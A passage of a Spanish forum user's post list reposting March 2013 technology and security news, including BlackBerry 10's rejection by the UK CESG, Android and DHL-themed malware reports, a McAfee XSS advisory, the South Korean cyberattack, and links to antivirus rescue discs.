Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - wolfbcn

#33796
Publicado el 20 de marzo de 2013 por Dani Burón

A pesar de que BlackBerry era el único sistema móvil hasta ahora aprobado por el Communications Electronics Security Group (CESG), su versión BlackBerry 10 ha sido rechazada al no pasar sus nuevas pruebas de seguridad.

Según encargados de la compañía canadiense, esto se ha debido a cambios en el proceso de aceptación. Estos cambios han provocado que sólo BlackBerry 7 y el iPhone hayan pasado ahora. Siendo BlackBerry 7 la única que ha pasado el nivel "restringido" según su normativa.

BlackBerry ha decidido trabajar con el gobierno británico para tratar de solventar estos problemas y ajustarse a la nueva normativa, pero los retrasos que puedan producir podrían perjudicar bastante a BlackBerry, que no se puede permitir perder la inercia de su lanzamiento.

Este rechazo choca sin embargo con las aprobaciones de los gobiernos estadounidense y alemán, que sí lo han aceptado como estándar para las comunicaciones seguras del gobierno.

Personalmente usar sistemas propietarios en entes públicos me parece absurdo, ya que poner los "secretos" de un país al resguardo de la seguridad de una compañía privada y los designios de unos pocos, en lugar de basarse en el diseño propio del país a partir de código libre sería la suyo, pero bueno, luego nos sorprenden las declaraciones de Jaume Matas sobre Urdangarin y sobre lo que es "normal"...

vINQulos

TheRegister

FUENTE :http://www.theinquirer.es/2013/03/20/blackberry-10-no-consigue-la-aceptacion-del-gobierno-britanico.html
#33797
Cada día resulta más fácil poder acceder a los dispositivos de los usuarios y llevar a cabo una infección con cualquier tipo de software malicioso. Symantec ha informado que durante la semana pasado se ha detectado una aplicación que simula ser de rayos X para que el usuario acceda a realizar la instalación y que así esta proceda a infectar el dispositivo Android. Según ha informado la compañía, el malware se está extendiendo rápidamente.

Desde Symantec han añadido que la aplicación tiene varios nombres y todos ellos hacen referencia a aplicaciones relacionadas con rayos X. La aplicación no se encuentra en las tiendas de aplicaciones oficiales pero sí que se puede obtener en las tiendas no oficiales y también en algunas páginas web cuya finalidad es más que sospechosa.

En algunas tiendas de hecho, a algunos usuarios se les hace pagar una cantidad de dinero por una aplicación que luego, después de ser instalada no va a funcionar, o al menos como el usuario desea.

¿Qué sucede cuando el malware es instalado?

A pesar de que el usuario crea que lo que se ha instalado es la aplicación que él cree, en realidad se ha instalado un malware que lo que llevará a cabo en primer lugar es su expansión y para ello utilizará la agenda de teléfonos de la tarjeta SIM que está insertada en el terminal. El malware se dedica a mandar varios mensajes de texto a los contactos del usuarios con la finalidad de extender la amenaza, pasando las tiendas de aplicaciones y las páginas web a un segundo plano en el procesos de expansión.

¿Es fácil de eliminar?

En principio, únicamente se ha detectado que el malware envía mensajes a los contactos de la tarjeta SIM del usuario. A pesar de ser algo "benévolo", la factura del usuario puede verse seriamente aumentada, ya que es un proceso que realiza varias veces a lo largo de una semana, a lo que puede añadirse como factor determinante la cantidad de contactos que posea la tarjeta.

Los usuarios encuentran algunos problemas para llevar a cabo la desinstalación de la aplicación, ya que esta no crea ningún punto de acceso en el launcher del sistema operativo, por lo que para los usuarios que no hayan trasteado tanto con el terminal, esto puede suponer un problema.

Sin contar que no darse cuenta de la existencia del mismo en el terminal puede acabar provocando una factura a pagar muy grande.

Fuente | The Hacker News

LEIDO EN :http://www.redeszone.net/2013/03/20/una-aplicacion-falsa-de-rayos-x-de-android-contiene-malware/
#33798
eMusic, uno de los servicios pioneros en el streaming de música, cierra sus puertas después de luchar por su supervivencia durante casi 15 años. El servicio ha sido comprado por K-NFB Reading, una empresa de distribución de eBooks y que también se encarga de la creación de software para lectores.

La empresa fue una de las primeras en ofrecer un modelo de suscripción de pago para el consumo de contenidos musicales, así como también fue pionera en la distribución legal de MP3s. A cambio de una cuota fija mensual, los usuarios tenían la posibilidad de descargar un número limitado de canciones que podían almacenar y reproducir en sus dispositivos.

La llegada de Apple al mercado de la venta de música con el iPod e iTunes, y más recientemente los servicios de streaming bajo demanda, acabaron por hundir a eMusic en el anonimato y la irrelevancia, que es el peor destino que puede tener un negocio o servicio en Internet.

A comienzos de la presente década intentaron ofrecer su propio sistema de streaming y lograron alcanzar varios acuerdos con las mayores discográficas de Estados Unidos, pero ya era demasiado tarde. En teoría eMusic no desaparece si no que será mantenido por su comprador, pero si tenemos en cuenta la escasa relevancia que tiene hoy en día no sería extraño que en pocos meses dejase definitivamente de existir.

Vía | Wall Street Journal

FUENTE :http://www.genbeta.com/multimedia/emusic-servicio-pionero-de-musica-cerca-de-su-desaparicion
#33799
La policía de Corea del Sur investiga un 'ciberataque' masivo contra canales de televisión y varios bancos del país, cuyas redes se han visto paralizadas por completo a las 14.00 hora local (06.00 hora española), en principio por razones desconocidas.

"Estamos investigando estos ciberataques en estos momentos", confirmó un portavoz policial después de que la agencia de noticias Yonhap informara de ataques contra tres canales de TV -KBS, MBC y YTN- y dos entidades bancarias -Shinhan y Nonghyup-, en un contexto de tensión con su Corea del Norte.

La Oficina Presidencial de Corea del Sur investiga la posible implicación de Corea del Norte, según indicaron fuentes de la Casa Azul de Seúl a Yonhap.

Las autoridades de Seúl no descartan ninguna posibilidad y "están intentando determinar la causa de la paralización de las redes", declaró a la agencia una alta autoridad de Presidencia.

Una portavoz de la brigada de Policía surcoreana especializada en ciberterrorismo afirmó, por su parte, que "los informes (del apagón) han llegado simultáneamente" y, apuntó que han enviado investigadores a los lugares donde se localizan los servidores afectados.

Tras conocerse los hechos, el Ejército de Corea del Sur ha elevado su estatus de vigilancia y "supervisa de cerca los acontecimientos que puedan producirse", informó a Efe un portavoz del Ministerio de Defensa, que descartó incidencia alguna en los sistemas informáticos de las Fuerzas Armadas del país.

Recientemente, Pyongyang acusó por primera vez a sus "enemigos" -en alusión a Corea del Sur y Estados Unidos- de lanzar una serie de ataques informáticos en su contra, como parte de su estrategia para "suprimir" el régimen comunista.

La agencia de noticias KCNA denunció que "los servicios informáticos estatales han estado bajo un intenso y continuo ataque", al parecer, durante varios días, aunque no ha especificados los objetivos ni las consecuencias. Los medios de comunicación rusos habían inforado previamente esta semana de que "un gran ataque informático" dejó fuera de servicio la red de telecomunicaciones norcoreana.

FUENTE :http://www.elmundo.es/elmundo/2013/03/20/navegante/1363762330.html
#33800
Microsoft acaba de lanzar una nueva versión del SDK (kit de desarrollo de software) de Kinect, su popular kit de herramientas de programación que permite el desarrollo de nuevas tecnologías basadas en el popular dispositivo Kinect.

Kinect SDK 1.7.0.529 viene con un montón de mejoras, incluyendo nuevas interacciones de Kinect y mejoras para el modelo de colaboración.

"Esto ha sido mejorado significativamente para proporcionar una interacción más natural cuando un usuario comience a interactuar con la aplicación, y particularmente cuando el sensor detecte varias personas. Además, ahora los desarrolladores también pueden reemplazar el modelo de colaboración ofrecido como deseen", dijo Microsoft sobre el modelo de colaboración.

Nuevas muestras de Kinect Fusion, APIs y detalles sobre DLL también están incluidas en esta nueva versión.

Por supuesto, la nueva versión del SDK de Kinect incluye muchas más novedades, así que haz clic en este enlace para ver la lista completa de cambios (en inglés) publicada en Softpedia.

Descarga gratis el Kinect SKD 1.7.0.529 desde Softpedia
http://www.softpedia.es/programa-Kinect-SDK-190054.html

FUENTE :http://news.softpedia.es/Descarga-Microsoft-Kinect-SDK-1-7-0-529-338490.html
#33801
Charaf Anons, un hacker de Anonymous Argelia, ha modificado más de 1.000 sitios web para mostrar su apoyo a Palestina y para protestar contra Israel.

Una lista de 1.600 sitios ha sido publicada en Pastebin, 906 de los cuales son sitios web chinos, informa HackRead.

Cabe destacar que, mientras que la mayoría de los sitios web chinos parecen ser comerciales, algunos de ellos pertenecen a instituciones educativas e incluso organizaciones gubernamentales.

E Hacking News destaca que algunas de las entradas son duplicados, por lo que el número total de sitios desfigurados es de alrededor de 1.000. El hacker dijo a EHN que necesitó menos de un día para añadir su página de desfiguración a la gran cantidad de sitios web.

En el momento de escribir esto, la mayoría de los sitios aún mostraban la página de desfiguración infiltrada por el hacker. En este tipo de ataques, cuando la página de desfiguración no reemplaza la página de índice del sitio web, puede tomar un tiempo hasta que el administrador se de cuenta del hackeo.

FUENTE :http://news.softpedia.es/Mas-de-1-000-sitios-web-han-sido-alterados-por-un-hacker-de-Anonymous-Argelia-338612.html
#33802
Durante el fin de semana, nos enteramos de que algunos hackers irritados lanzaron ataques distribuidos de denegación de servicio (DDOS) contra el sitio web de Brian Krebs y enviaron un equipo de SWAT a su casa. Después de investigar el incidente más detenidamente, el experto en seguridad ha descubierto algunas cosas interesantes.

Después de ponerse en contacto con el propietario de booter.tw, el servicio utilizado para lanzar los ataques DDOS contra su sitio y contra Ars Technica, Krebs descubrió que un individuo que utiliza el apodo en línea de Phobia es el culpable.

De una fuente independiente, Krebs averiguó que el artículo de ssndob.ru fue realmente lo que molestó a los atacantes. Resulta que un equipo de jugadores de Xbox Live llamado Team Hype utiliza ssndob.ru para obtener números de seguro social que luego utilizan para secuestrar las identidades en línea de los empleados de Microsoft que trabajan en la plataforma Xbox Live.

Esta historia fue confirmada por los videos de YouTube publicados por Team Hype en su canal.

Phobia, quien es miembro de Team Hype, estuvo muy enojado por el hecho de que Krebs expuso el sitio web que estaba utilizando.

Al igual que muchos hackers, la información de Phobia ha sido expuesta en internet en algún momento. El experto en seguridad descubrió que los detalles filtrados contenían el número de teléfono del hacker, por lo que decidió llamarlo por teléfono.

Durante la llamada, Krebs recordó que Phobia era el mismo hacker que supuestamente hackeó las cuentas del periodista Mat Honan de Wired hace algunos meses.

De su conversación con Phobia (aparentemente un joven de 20 años llamado Rayn de Milford Connecticut), Krebs aprendió que él realmente era el hacker mencionado por Mat Honan después del incidente.

Cuando se le preguntó si era miembro de Team Hype, Ryan dijo que ya no estaba trabajando con ellos desde hace unos 6 meses. Sin embargo, Krebs señaló que hay unos vídeos publicados por Phobia en febrero.

En un momento dado, el padre del joven de 20 años intervino en la conversación para explicar que su hijo era "un buen chico". Entre tanto, todos los vídeos publicados por Phobia fueron retirados "misteriosamente"de YouTube.

FUENTE :http://news.softpedia.es/Encuentran-una-conexion-entre-los-ataques-contra-Brian-Krebs-Ars-Technica-y-Mat-Honan-338525.html

Relacionado : https://foro.elhacker.net/noticias/unos_hackers_irritados_lanzaron_un_ataque_ddos_contra_el_sitio_web_de_brian-t385764.0.html;msg1837537;topicseen#msg1837537
#33803
El Departamento de Justicia y la Comisión de Bolsa y Valores de EEUU están examinando las denuncias hechas por un ex trabajador de Microsoft en China por presuntos sobornos, así como la relación de la empresa con los revendedores y consultores en Rumania e Italia, según informa 'The Wall Street Journal'.

La investigación está en una fase preliminar, según fuentes cercanas a la misma, y el Gobierno aún no ha acusado oficialmente a Microsoft o cualquiera de sus socios. Tampoco está claro aún que se puedan llegar a presentar cargos.

"Al igual que todas las grandes empresas con operaciones en todo el mundo, a veces se reciben denuncias sobre posibles malas prácticas de los empleados o socios de negocio", ha dicho John Frank, vicepresidente de Microsoft y consejero adjunto, a esta publicación. "Estamos cooperando plenamente con la investigación", agregó.

Los datos sobre China provienen de un informante anónimo y fue recibido por investigadores estadounidenses en 2012. Estos datos también fueron objeto de una investigación interna en Microsoft que finalizó en 2010. En dicha empresa no encontraron evidencia alguna de delito.

El denunciante alegó que un ejecutivo de la filial de Microsoft en China le instruyó para llevar a cabo sobornos a los funcionarios a cambio de firmar los contratos de software. Este empleado finalizó su contrato en 2008 tras una disputa laboral con la empresa.

Investigadores del gobierno estadounidense también están comprobando si Microsoft tenía un papel en las denuncias donde se acusa de presuntos sobornos con el Ministerio rumano de Comunicaciones. Un portavoz del ministerio dijo que las acusaciones eran incompatibles con los registros de la agencia y que los funcionarios del ministerio no están al tanto de los acuerdos de negocios entre Microsoft y sus intermediarios.

También están buscando relaciones con los consultores italianos, especializados en programas de fidelización de clientes. Se han recibido denuncias de que en Microsoft (Italia) utilizan dichos consultores como vehículos para prodigar regalos y viajes a los funcionarios italianos a cambio de negocios con el ejecutivo.

Microsoft alega por su parte que más de 170 empleados se encargan de investigar y hacer cumplir las políticas de la empresa. "Nos tomamos en serio todas las denuncias y las investigamos de forma independiente", recalcó John Frank a 'The Wall Street Journal'.

FUENTE :http://www.elmundo.es/elmundo/2013/03/19/navegante/1363716448.html
#33804
Ser una persona anti-tecnología es algo raro de ver en el mundo de hoy, pero incluso aquellos que gustan mucho de ella, en ocasiones también pueden aprender a rechazarla. Esto es lo que ha pasado en el caso de las Google Glass. Ya hace días comentamos un poco sobre los primeros pasos de la campaña anti-Glass, y hoy volvemos a tener un pequeño reporte.

La semana pasada fue lanzado un sitio web llamado "Stop The Cyborgs" http://stopthecyborgs.org/about/ cuyo creador o asociados no son conocidos. El tema es que la idea del mismo es hacer frente a las gafas Glass y la posible perdida de privacidad que las mismas podrían traer consigo. La idea detrás del sitio es "responder al proyecto Glass y otras tendencias tecnológicas" para "impedir un futuro en el cual la privacidad no exista y el control corporativo sea total".

Lo cierto es que el sitio tiene argumentos bastante sólidos a favor, sobretodo en cuanto a las Glass respecta, ya que en pocos segundos una persona puede tomarnos una foto sin que nos demos cuenta y colgarla en Internet.


Fuente:http://www.dvice.com/2013-3-18/anti-google-glass-site-wants-fight-future-full-cyborgs

LEIDO EN :http://www.laflecha.net/canales/blackhats/noticias/stop-the-cyborgs-otra-campana-anti-google-glasses
#33805
McAfee ha publicado una alerta de seguridad para informar de una vulnerabilidad que afecta a su producto Vulnerability Manager. Esta vulnerabilidad podría permitir a un atacante remoto llevar a cabo ataques Cross-Site Scripting.

McAfee Vulnerability Manager es una herramienta de seguridad que ofrece evaluación de vulnerabilidades, pruebas de penetración, análisis de aplicaciones web y detección de dispositivos no fiables presentes en la red tales como smartphones, tablets, portátiles, e incluso dispositivos ocultos.

La vulnerabilidad que afecta a McAfee Vulnerability Manager se debe a la falta de comprobación de determinados parámetros de entrada en los componentes "Foundstone\Portal\components\vulnset.exp" y "Foundstone\Portal\include\init.inc" antes de ser devueltos al usuario, que podrían conducir a ataques Cross-Site Scripting (XSS). De esta forma un atacante remoto podría ejecutar código HTML y javascript arbitrario en el navegador del usuario.

Se encuentran afectadas las versiones de McAfee Vulnerability Manager 7.5.x. McAfee ha publicado los siguientes hotfix para corregir el fallo, disponibles para su descarga desde la página oficial:

•MVM 7.5.0: 7_5_0_20011_EM.zip

•MVM 7.5.1: 7_5_1_05006_EM.zip


McAfee también informa que dicho parche estará incluido en la versión 7.5.2 que será lanzada a finales de Marzo.

Más información:

McAfee Vulnerability Manager Hotfixes available to address cross-site scripting vulnerability https://kc.mcafee.com/corporate/index?page=content&id=KB77772

McAfee Download Site http://www.mcafee.com/us/downloads/downloads.aspx

FUENTE :http://www.laflecha.net/canales/seguridad/noticias/cross-site-scripting-en-mcafee-vulnerability-manager-75
#33806
Nuevas evidencias han reforzado la teoría de un acercamiento cada vez más claro de la saga shooter de Microsoft a los compatibles, a pesar de la versión oficial. En concreto, lo haría a través de uno de las entregas mejor valoradas por sus aficionados: Halo 3, por lo que el regreso a dicha plataforma sería por todo lo alto.

Y fue precisamente ese mismo título el primero de la saga que no vería la luz en PC, tras los dos primeros títulos estrenados tanto en aquélla como en la original Xbox. Desde entonces, ninguno de los juegos que posteriormente vieron la luz llevaron su versión correspondiente a los ordenadores.

Una decisión difícil de entender para los aficionados de la saga, pero que escondía tras ella una clara apuesta por hacer de su segunda consola la plataforma ideal para los videojuegos. Era el estreno de la actual generación de consolas, y Microsoft sabía que convirtiendo su saga más popular en un producto exclusivo de su nuevo hardware, su popularidad arrastraría a muchos consumidores a adquirir finalmente la consola; y con ello, asentarse definitivamente en el sector, como bien se ha visto.

Ahora, seis años después de este primer desplante, los usuarios que quedaron desencantados con la compañía podrían verse recompensados, ya que se ha reforzado la idea del retorno del shooter.

No son nuevos los rumores que han apuntado a un regreso de la franquicia al ordenador, y prácticamente desde entonces a cada entrega que veía la luz, se especulaba con su estreno en compatibles.

Pero en esta ocasión, parece más cercano el día en que ello ocurra. Ocurre tras haber visto la luz una serie de códigos registrados en los controladores Catalyst 13.3 cuya segunda fase beta fue recientemente lanzada por su fabricante, AMD, destinados exclusivamente a dicha plataforma. Dichos códigos han visto la luz a través de un post en k00tcn, en los que se puede leer claramente las referencias a Halo 3:

http://www.gamerzona.com/wp-content/uploads/2013/03/Halo-3-ordenador.jpg

¿Significa ello que está más cerca el reestreno de la saga en PC? Lógicamente, abre muchas puertas a tal posibilidad, si bien, hasta el momento, Microsoft se ha mantenido firme en su postura de negar cualquier proyecto de llevar a la saga fuera de su gama de consolas. Y lo hace con la entrega mejor valorada de la saga por los aficionados, junto a Halo: Reach.

¿Creéis que finalmente dará marcha atrás y volveremos a ver las aventuras del Jefe Maestro en compatibles? ¿Seguirá en sus trece la compañía y continuará apoyando su carácter exclusivo para Xbox? ¿Qué debería hacer Microsoft? ¿Ha sido Halo 3 el mejor título de la saga?

FUENTE :http://www.gamerzona.com/2013/03/19/halo-podria-regresar-a-pc/
#33807
La Ley Sinde-Wert se cobra una víctima de forma indirecta. El conocido foro español con enlaces a series televisivas Tusseries.com cierra de forma voluntaria tras recibir su administradora una notificación del Ministerio de Cultura, del que depende la llamada Comisión Sinde.

La norma para acabar por la vía administrativa con las webs de enlaces sigue sumando pequeños triunfos para sus impulsores y la industria cultural y del entretenimiento. Sin embargo, lejos de hacerlo por el procedimiento sancionador incluido en su reglamento, ha vuelto a utilizar el miedo como herramienta para acabar con uno de los portales de habla hispana dedicado a las series más conocido.

Como leemos en nuestro foro, la administradora de Tusseries.com ha anunciado el cierre del foro. "Me acaba de llegar una carta del Ministerio de Educación (que incluye también las carteras de Cultura y Deportes) para que me identifique como dueña del foro. Hace falta poca imaginacion para saber qué vendrá después, así que sintiéndolo mucho cierro el foro despues de 10 años. Gracias a todos", explica en un corto pero claro mensaje.

Se pone así punto y final a una trayectoria en la Red que se ha prolongado durante varios años hasta el punto de ser un referente a la hora de ofrecer enlaces a archivos que circulaban en redes P2P como eMule, tanto en versión original, con subtítulos o versión doblada. La web, que evolucionó al formato foro con el paso de los años, era mantenida de forma altruista y sin ánimo de lucro a través de los donativos de sus usuarios, cuyas aportaciones servían para mantener online el portal. El cierre ha supuesto todo un jarro de agua fría para aquellos que habían apoyado el proyecto.

El caso de Tusseries.com nos recuerda al del portal Bajui, que recogimos a mediados del pasado año. Al igual que ha sucedido en esta ocasión, el administrador de la web había optado por el cierre voluntario del portal ante la amenaza de ser sancionado con una multa que oscilaba entre los 150.001 y los 600.000 euros por los enlaces a contenidos protegidos con derechos de autor. La imposibilidad de controlar la actividad de sus usuarios, que eran quienes aportaban los enlaces, provocó que éste cerrase el portal por miedo a esta elevada sanción económica.

Como explicaba por entonces el abogado David Bravo, este temor parece la principal baza de la Ley Sinde-Wert para acabar con todo tipo de webs que incomoden a la industria. "Muchas decidirán cerrar por miedo a que les pidan responsabilidades. Algún mal pensado puede creer que eso es precisamente lo que pretenden", vaticinaba hace un año el letrado. No se equivocaba como ha demostrado el caso de Tusseries.com.

FUENTE :http://www.adslzone.net/article11036-la-ley-sinde-provoca-el-cierre-de-tusseriescom-despues-de-10-anos-online.html
#33808
Por un tiempo, el Curiosity dejará de mandar informaciones a la Tierra sobre los análisis de las muestras de roca extraídas en el planeta vecino

El Curiosity ha tenido un segundo fallo informático que ha generado un paro no planeado en el robot de la NASA, famoso por descubrir que hubo condiciones adecuadas para albergar vida en el planeta vecino.

Los ingenieros esperan reanudar en los próximos días las operaciones científicas del Curiosity tras interceptar hace dos semanas un problema con el ordenador principal del aparato destinado en Marte.

El domingo se produjo un segundo problema informático cuando el robot estaba tratando de enviar a la Tierra archivos de datos por radio, según informó el científico principal John Grotzinger, del Instituto de Tecnología de California

"Esto no es algo que sea raro o poco común", dijo Grotzinger en una rueda de prensa retransmitida por Internet durante la Conferencia de Ciencia Planetaria y Lunar en Houston.

El principal problema es que la siguiente tanda de resultados científicos estará interrumpida en principio durante unos días más, dijo a Reuters Grotzinger.

Antes del error, el robot, que aterrizó en Marte el pasado 6 de agosto, había enviado por radio a la Tierra su primer análisis de muestras de roca perforada obtenidas en el lugar de aterrizaje del robot en Gale Crater.

Los científicos también anunciaron nuevas pruebas el lunes ya que el Curiosity está situado en una zona en la que en su día hubo agua abundante, un ingrediente clave para la vida.

La cámara del aparato y su sonda de neutrones fabricada en Rusia encontraron más pruebas de agua en la llamada zona Yellowknife Bay, donde el robot está ubicado actualmente, que en los lugares estudiados anteriormente en la misión.

FUENTE :http://www.publico.es/452364/un-nuevo-fallo-informatico-apaga-el-robot-de-la-nasa-en-marte
#33809
Expertos de seguridad de Sophos han informado de la difusión de un gran número de mensajes de correo que, asegurando proceder de DHL Express International, están diseñados para instalar malware en los ordenadores de los usuarios.

Si usted ha recibido un correo electrónico con el asunto "Express Shipment Notification", debe mantenerse en guardia, ya que su ordenador Windows puede estar en grave riesgo. Así, alertan desde Sophos de un nuevo ataque de spam que, haciéndose pasar por la empresa de mensajería DHL Express, trata de engañar a los incautos destinatarios.

Procedentes de DHL Express International, los correos electrónicos detectados incluyen un archivo ZIP que contiene malware y cuyo nombre puede variar, pero toma la forma de "DHL reportXXXXXX.zip" (donde las X son un código aleatorio). Los productos de Sophos han detectado que la carga maliciosa que contiene es el troyano Troj/BredoZp-S. Por supuesto, Sophos aclara que los mensajes de correo electrónico en realidad no proceden de la compañía de mensajería, y el hecho de que se pueda haber recibido un email que contiene DHL en el campo del remitente no quiere decir que los sistemas informáticos de DHL se hayan visto comprometidos, sino que los atacantes han copiado las cabeceras de correo electrónico.

"Una vez tras otra hemos visto a los ciberdelincuentes utilizar el disfraz de las compañías de mensajería como DHL y FedEx para difundir sus ataques de malware y secuestrar los ordenadores de los incautos. Su mejor protección no consiste únicamente en disponer de un buen antivirus actualizado, sino también en vivir y respirar la seguridad informática en su vida cotidiana", asegura Graham Cluley, consultor senior de tecnología de Sophos.

FUENTE :http://www.csospain.es/Alertan-de-una-nueva-oleada-de-spam-de-DHL-Express/sección-alertas/noticia-131487
#33810
La compañía Purina Friskies y Gamesforcats.com preparan un 'hackathon' para el próximo 23 de marzo en el que se creará el mejor videojuego o la mejor aplicación para gatos. La mejor creación conseguirá un premio de 15.000 dólares (11.590 euros). El concurso tendrá lugar en Venice Beach (California, EE.UU.).

Los vídeos de gatos en Internet se han convertido en una auténtica fiebre. Pero si además se trata de vídeos en los que, por ejemplo, el animal está utilizando un 'smartphone' o un 'tablet', las visitas en paltaformas como Youtube crecen como la espuma en un tiempo récord. Aunque todavía no se ha podido saber qué tienen los vídeos de gatos para que causen tanta expectación entre los usuarios, la división de Purina especializada en comida y artículos para Gatos, Friskies, ha pensado en un nuevo concurso bastante original relacionado con estos fieles clientes.
Se trata del Friskies Game for Cats Hackathon, un concurso pensado para desarrolladores que sean capaces de crear la mejor aplicación o juego para estas mascotas. El torneo convocará a 75 desarrolladores que se reunirán en grupos de cinco. El equipo que resulte ganador hará con 15.000 dólares (11.590 euros) y su juego será publicado en Games for cats.

También tendrán su recompensa aquellos gurpos que queden en segunda y tercera posición, con 3.000 y 2.000 dóalres (2.300 y 1.500 euros), respectivamente. El 'hackathon' tendrá lugar en Venice Beach (California) el sábado 23 y domindo 24 de marzo.

- Games for Cats (http://www.gamesforcats.com/).

FUENTE :http://www.laflecha.net/canales/blackhats/noticias/no-te-pierdas-el-proximo-23-de-marzo-el-hackathon-para-crear-la-mejor-aplicacion-para-gatos
#33811
La Línea de Atención sobre Ciberbullying, red europea para la denuncia de casos de acoso en la Red entre menores, atendió 343 casos en España en 2012. El fenómeno ha ido en aumento desde que este servicio se puso en marcha en 2008, cuando se registraron 227. "Un incremento del 151% en solo cinco años", destaca Guillermo Cánovas, responsable de Protégeles, entidad que trabaja para que los jóvenes hagan un uso responsable de Internet. Para revertir esta tendencia, la Comisión Europea y Protégeles han lanzado este martes la campaña European Superkids Online en España, Dinamarca, Italia y Polonia. El programa, dirigido a profesores y alumnos de Primaria (entre 10 y 13 años), incluye guías didácticas y material audiovisual online en yocontrolo.com para que los pequeños tengan herramientas contra el ciberacoso antes de que utilicen intensivamente las redes sociales.

El 13% de los adolescentes españoles ha sido víctima de ciberbullying (acoso entre menores en la Red) alguna vez, y el 9,4% confiesa haber ciberacosado a algún compañero, según datos del estudio europeo EU-NET-ADB, realizado por distintas universidades europeas y centros de seguridad en Internet. "Puede parecer que es un porcentaje bajo, pero significa decenas de miles de jóvenes sufriendo esta situación. No es una anécdota", ha subrayado Cánovas durante la presentación de la campaña. El responsable de Protégeles alerta de que, según sus datos, la mitad de los jóvenes que han sido ciberacosados acosan a otros. "La conclusión es que cuantos más menores sean víctimas, más se extenderá el problema", ha dicho.

Paula Dallí, actriz de la serie de Disney La Gira, que participa junto a sus compañeros de reparto en los vídeos didácticos de la campaña que muestran casos cotidianos de ciberacoso, ha confesado que ella misma ha sido víctima de suplantación de identidad en las redes sociales. "Nosotros estamos expuestos y algunos menores se hacen pasar por nosotros para insultar y acosar a otros adolescentes", ha relatado. La suplantación de identidad para hostigar a otros es una de las formas más comunes de ciberacoso entre adolescentes. Con ello, consiguen que la persona a la que le han usurpado el nombre para insultar sea rechaza por todos. "Muchas veces no son conscientes del daño que hacen", ha continuado Dallí. En este sentido, Cánovas ha apuntado que muchos de los acosadores creen que "todo es una broma".

Los datos contradicen, sin embargo, que las víctimas de ciberbullying se tomen a broma los insultos y el hostigamiento en Internet. Más del 80% asegura que les afecta mucho a su vida, sus estudios, sus relaciones familiares y con amigos. Sobre todo a ellas (89% frente al 75% de los chicos que hace esta afirmación). Las chicas no son solo las que más sufren, según Cánovas, sino también las que más acosan porque "ellos dedican más tiempo a jugar que a las redes sociales".

El objetivo de la campaña es triple: que los menores aprendan a no exponer en exceso su intimidad, evitar que acosen a otros por Internet y que sepan qué hacer y dónde acudir en caso de ser víctimas. Los profesores tienen un papel central en este proceso. Por eso, esta campaña está dirigida también a maestros. "Les damos conocimientos teóricos y actividades grupales que pueden hacer en clase", ha recordado Ana Oliaga, psicóloga del Centro de Seguridad en Internet de Protégeles y coordinadora de la campaña en España. El entorno escolar suele ser el escenario del ciberacoso, en tanto que se suele producir entre compañeros que trasladan sus fricciones a la Red, como han constatado los psicólogos de Protégeles.

Los padres son el otro pilar fundamental para evitar situaciones de riesgo. "Muchas veces desconocen las aplicaciones que utilizan sus hijos", alerta Cánovas. "Ahora organizamos charlas en sus centros de trabajo para concienciarles. Así nos lo pidieron los chicos en los encuentros que tenemos con ellos", añade. Un 20% de las denuncias en la Línea de Atención sobre Ciberbullying en 2012 las hicieron las víctimas sin que sus padres tuvieran conocimiento de la situación.

FUENTE :http://sociedad.elpais.com/sociedad/2013/03/19/actualidad/1363700296_848102.html
#33812
Hay ocasiones en las que navegando por Internet o descargando archivos podemos ser objeto de hackers y acabar infectado por un virus que hace imposible el trabajo en el equipo. Intentamos reiniciar el equipo para ver si conseguimos que funcione mejor pero el virus se ha cargado algún archivo de arranque o simplemente comienza a funcionar en cuanto el sistema operativo carga y nos vuelve a bloquear el sistema no pudiendo ni siquiera acceder a nuestros archivos.

En otras ocasiones nos podemos encontrar con algún virus que se encuentra actualmente en ejecución y nos es imposible eliminarlo. Normalmente un antivirus suele evitar que ocurran este tipo de cosas, pero no son al 100% efectivos. Puede ocurrir que el virus sea nuevo y aún no detectado por el antivirus, un fallo en este o simplemente lo hemos deshabilitado anteriormente para realizar una prueba y se nos ha olvidado activarlo de nuevo.

En estos casos la opción más simple y radical suele ser proceder a un formateo completo del equipo, pero de esta manera perderemos todos los archivos que teníamos en el disco del sistema.

Seguir leyendo : http://www.redeszone.net/2013/03/19/5-antivirus-live-cd-para-recuperar-y-desinfectar-tu-equipo/

Avira Antivir Rescue System

Descarga: http://dlpro.antivir.com/package/rescue_system/common/en/rescue_system-common-en.iso
(240 MB)


AVG Rescue CD

CD
Descarga: http://www.avg.com/ww-es/download-file-cd-arl-iso
(80 MB)

USB
http://download.avg.com/filedir/inst/avg_arl_ffi_all_120_120823a5411.rar
fecha 22. Noviembre 2012   Tamaño: 92 MB

Diferentes versiones para hacer CD bootable o por USB:
http://www.avg.com/us-en/avg-rescue-cd-download


BitDefender Rescue Disk CD

Descarga: http://download.bitdefender.com/rescue_cd/bitdefender-rescue-cd.iso
(380 MB)

F-Secure Rescue CD

Descarga: http://download.f-secure.com/estore/rescue-cd-3.16-52606.iso

Descarga: http://www.f-secure.com/linux-weblog/files/f-secure-rescue-cd-3.11.23804.zip


Kaspersky Rescue Disk 10

Descarga: http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso


Panda SafeCD

Descarga: http://resources.downloads.pandasecurity.com/tools/SafeCD.iso

Cómo grabar una imagen ISO

PandaRescueDisk

Descarga:
http://www.pandasecurity.com/resources/sop/safecd/pandarescuedisk.iso

Dr.Web LiveCD y LiveUSB

Descarga: http://download.geo.drweb.com/pub/drweb/livecd/drweb-livecd-602.iso

Dr.Web LiveUSB

Descarga: http://download.geo.drweb.com/pub/drweb/liveusb/win/drwebliveusb.exe


Comodo Rescue Disk

Descarga: http://downloads.comodo.com/crd/download/setups/comodo_rescue_disk_2.0.261647.1.iso
#33813
Andrew Auernheimer, experto informático detenido hace tres años y que se declaró hace dos años culpable de un 'ataque' a servidores de la compañía telefónica AT&T y de publicar información personal de unos 120.000 usuarios de iPad, ha sido condenado a tres años y cinco meses de prisión.

